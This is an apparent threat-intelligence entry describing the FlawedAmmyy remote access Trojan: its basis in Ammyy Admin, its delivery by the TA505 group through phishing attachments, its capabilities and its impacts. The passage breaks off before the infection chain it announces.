FLAWEDAMMYY

FlawedAmmyy is a remote access Trojan (RAT) based on Ammyy Admin, a legitimate remote access tool used to handle remote control and diagnostics on Microsoft Windows machines. FlawedAmmyy RAT has the functionality of the leaked version, including remote desktop control, file system manager, proxy support and audio chat.

FlawedAmmyy was seen used in phishing campaigns to potentially create a large base of compromised computers. It was also seen in targeted campaigns that create opportunities for actors to steal customer data, proprietary information, and more. In the latest campaign of TA505, a group known for attacks against multiple financial institutions and retail companies, they started using HTML attachments to deliver malicious .XLS files that lead to a downloader and the backdoor FlawedAmmyy, mostly affecting South Korean users.

Upon infection, the RAT can enable potential attackers to perform a variety of malicious activities such as:

• gain complete access to PCs' camera and microphone

• capture screenshots

• access a variety of services, steal files and credentials

• steal customer data, proprietary information, etc.

It is capable of the following:

• Information Theft

• Backdoor commands

Possible impact of FlawedAmmyy includes:

• Financial loss

• Compromised system security

• Violation of user privacy

FlawedAmmyy typically follows the infection chain below: